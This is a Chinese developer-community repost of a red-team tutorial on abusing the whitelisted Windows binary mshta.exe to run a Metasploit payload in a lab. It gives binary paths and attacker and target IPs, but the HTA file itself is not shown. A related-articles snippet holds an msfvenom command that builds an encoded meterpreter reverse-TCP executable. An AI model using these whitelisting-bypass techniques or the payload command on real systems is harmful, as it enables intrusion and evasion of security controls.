Loading [MathJax]/jax/output/CommonHTML/config.js

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

社区首页 >专栏 >基于白名单 Mshta.exe 执行 Payload 第五季

基于白名单 Mshta.exe 执行 Payload 第五季

作者头像

洛米唯熊

发布于 2019-07-25 07:01:43

发布于 2019-07-25 07:01:43

9230

举报

文章被收录于专栏：洛米唯熊洛米唯熊

文章来源：Micropoor 原文链接：https://micropoor.blogspot.com

Mshta简介：

Mshta.exe是微软Windows操作系统相关程序，英文全称Microsoft HTML Application，可翻译为微软超文本标记语言应用，用于执行.HTA文件。

说明：Mshta所在路径已被系统添加PATH环境变量中，因此，可直接执行Mshta.exe命令。

基于白名单Mshta.exe配置payload：

Windows 7 默认位置：

C:\Windows\System32\mshta.exeC:\Windows\SysWOW64\mshta.exe

攻击机：192.168.1.4 Debian

靶机： 192.168.1.3

Windows 7配置攻击机msf：

附录：Micropoor.hta

注：x86 payload

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2019-04-26，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自洛米唯熊微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

评论

登录后参与评论

暂无评论

编辑精选文章

换一批

万字详解高可用架构设计

Go 开发者必备：Protocol Buffers 入门指南

10分钟带你彻底搞懂分布式链路跟踪

多租户的 4 种常用方案

亿级月活的社交 APP，陌陌如何做到 3 分钟定位故障？

60页PPT全解：DeepSeek系列论文技术要点整理

基于白名单 Regasm.exe 执行 Payload 第三季

windows https .net 网络安全

Regasm为程序集注册工具，读取程序集中的元数据，并将所需的项添加到注册表中。RegAsm.exe是Microsoft Corporation开发的合法文件进程。它与Microsoft.NETAssembly Registration Utility相关联。

洛米唯熊

2019/07/25

6650

基于白名单 Regasm.exe 执行 Payload 第三季

基于白名单 Regsvcs.exe 执行 Payload 第四季

windows https 网络安全 .net

Regsvcs为.NET服务安装工具，主要提供三类服务：加载并注册程序集。生成、注册类型库并将其安装到指定的 COM+ 1.0 应用程序中。配置以编程方式添加到类的服务。

洛米唯熊

2019/07/25

3870

基于白名单 Regsvcs.exe 执行 Payload 第四季

基于白名单 Installutil.exe 执行 Payload 第二季

windows https 网络安全

Installer工具是一个命令行实用程序，允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。

洛米唯熊

2019/07/25

6530

基于白名单 Installutil.exe 执行 Payload 第二季

基于白名单 Msbuild.exe 执行 Payload 第一季

windows ide xml

MSBuild是 Microsoft Build Engine 的缩写，代表 Microsoft 和 Visual Studio 的新的生成平台。MSBuild 在如何处理和生成软件方面是完全透明的，使开发人员能够在未安装Visual Studio 的生成实验室环境中组织和生成产品。

洛米唯熊

2019/07/25

6620

基于白名单 Msbuild.exe 执行 Payload 第一季

社会工程学 | 白名单Msiexec执行payload方式！

声明：本人坚决反对利用文章内容进行恶意攻击行为，一切错误行为必将受到惩罚，绿色网络需要靠我们共同维护，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全。

安全小王子

2023/02/25

4930

社会工程学 | 白名单Msiexec执行payload方式！

红队技巧-白加黑

白就是此文件在杀软的白名单中，不会被杀软查杀；黑就是我们的恶意代码，由自己编写。通常白黑共同组成木马的被控端，最大限度的逃避杀软查杀，增强抗杀能力，而且方便免杀处理。一般情况下白为exe（带有签名），黑为dll或者其他，当然黑可以分成多部分。

Gamma实验室

2021/04/28

2.5K0

使用mshta.exe绕过应用程序白名单

安全 android http https 网络安全

今天，我们将学习有关HTA攻击的不同方法。HTA是有用且重要的攻击，因为它可以绕过应用程序白名单。在上一篇文章中，我们讨论了“ Windows Applocker策略-入门指南 ”，因为它们定义了应用程序控制策略的AppLocker规则以及如何使用它们。但是今天，您将学习如何使用mshta.exe绕过Applocker策略。

全栈程序员站长

2022/09/08

9790

使用mshta.exe绕过应用程序白名单

使用mshta.exe绕过应用程序白名单（多种方法）

安全 https powershell 网络安全 android

很长一段时间以来，HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分。HTA文件在网络安全领域内广为人知，从红队和蓝队的角度来看，它是绕过应用程序白名单有价值的“古老”方式之一。运行Microsoft HTML应用程序主机的Mshta.exe，Windows OS实用程序负责运行HTA（HTML应用程序）文件。我们可以运行JavaScript或Visual的HTML文件。您可以使用Microsoft MSHTA.exe工具解析这些文件。

全栈程序员站长

2022/09/06

1.9K0

使用mshta.exe绕过应用程序白名单（多种方法）

基于Windows白名单执行Payload上线Metasploit - 渗透红队笔记

windows shell 云数据库 MySQL

Rundll32是指32位的DLL文件，它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。

渗透攻击红队

2020/11/25

2.5K0

基于Windows白名单执行Payload上线Metasploit - 渗透红队笔记

基于白名单的Payload

windows shell powershell linux 网络安全

Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包（MSI）,一般在运行Microsoft Update安装更新或安装部分软件的时候出现，占用内存比较大。并且集成于Windows 7，Windows 10等，在Windows 10系统中无需配置环境变量就能直接被调用，非常的方便。

王瑞MVP

2022/12/28

4.1K0

网络安全：小心MSHTA漏洞为黑客开启远程控制之门

windows 网络安全安全 html vbscript

这是一个可以让黑客欣喜若狂的新漏洞，一旦该漏洞被激活，就会有大量计算机成为黑客手中的肉鸡，被人远程控制不可避免……

全栈程序员站长

2022/09/14

1.5K0

社工钓鱼之Office钓鱼(下)

shell office 测试框架漏洞

CVE-2017-11882是微软公布的一个远程执行漏洞，该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的OLE数据时，在拷贝公式字体名称时没有对名称长度进行校验，从而造成栈缓冲区溢出，是一个非常经典的栈溢出漏洞，该漏洞主要影响以下应用：

Al1ex

2023/05/26

5270

社工钓鱼之Office钓鱼(下)

sqlps.exe白名单的利用（过S60！）

sql sql server 数据库 http

sqlps.exe是SQL Server附带的一个具有Microsoft签名的二进制文件，用于加载SQL Server cmdlet，Microsoft Visual C#开发，可用ILSpy反编译查看源代码。

潇湘信安

2022/04/01

1.1K0

sqlps.exe白名单的利用（过S60！）

fsi.exe和cdb.exe白名单的利用

node.js ide unity

fsi.exe、fsianycpu.exe是FSharp解释器，这些具有Microsoft签名的二进制文件包含在Visual Studio中，可用于在命令行下直接执行FSharp脚本（.fsx 或.fsscript）。Fsi.exe在64位的环境中执行，Fsianycpu.exe则使用“机器体系结构来确定是作为32位还是64位进程运行”。

潇湘信安

2022/04/01

1K0

fsi.exe和cdb.exe白名单的利用

windows命令执行防御规避总结

github git 开源 xml

通过sip劫持对恶意代码签名获得系统信任https://github.com/secretsquirrel/SigThief

drunk_kk

2021/11/12

7950

无文件落地攻击

windows 网络安全安全 windows server shell

所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法，常用于逃避传统的安全检测机制，本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。

Al1ex

2021/07/21

2.1K0

使用MSF生成各种Payload

python windows linux

Windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe Linux: msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻

王瑞MVP

2022/12/28

6060

常见的windows下无文件落地攻击手法

安全 windows http https 网络安全

传统的恶意软件(例如.exe)攻击感染一个系统之前会把恶意文件（例如exe）复制到目标磁盘中并修改注册表并连接到此文件来达到一个长期隐藏的目的，无文件落地攻击是指即不向磁盘写入可执行文件，而是以脚本形式存在计算机中的注册表子项目中，以此来躲避杀软的检测，那么绕过了传统防病毒（AV）寻找被保存到磁盘上的文件并扫描这些文件以确定它们是否恶意的查杀方法。

黑白天安全

2021/03/16

6.3K0

常见的windows下无文件落地攻击手法

蛇从暗黑中袭来——响尾蛇(SideWinder) APT组织2020年上半年活动总结报告

apt-get 安全 .net https 网络安全

响尾蛇(又称SideWinder，T-APT-04)是一个背景可能来源于印度的 APT 组织，该组织此前已对巴基斯坦和东南亚各国发起过多次攻击，该组织以窃取政府，能源，军事，矿产等领域的机密信息为主要目的。

Gcow安全团队

2020/07/14

1.2K0

蛇从暗黑中袭来——响尾蛇(SideWinder) APT组织2020年上半年活动总结报告

干货 | Office文档钓鱼的实战和免杀技巧

vba windows server http html https

原文链接:https://mp.weixin.qq.com/s/OdCrUOsVAscqOjWaq2w8hQ

HACK学习

2021/12/13

8.1K0

干货 | Office文档钓鱼的实战和免杀技巧

相关推荐

基于白名单 Regasm.exe 执行 Payload 第三季

更多 >

💥开发者 MCP广场重磅上线！

精选全网热门MCP server，让你的AI更好用 🚀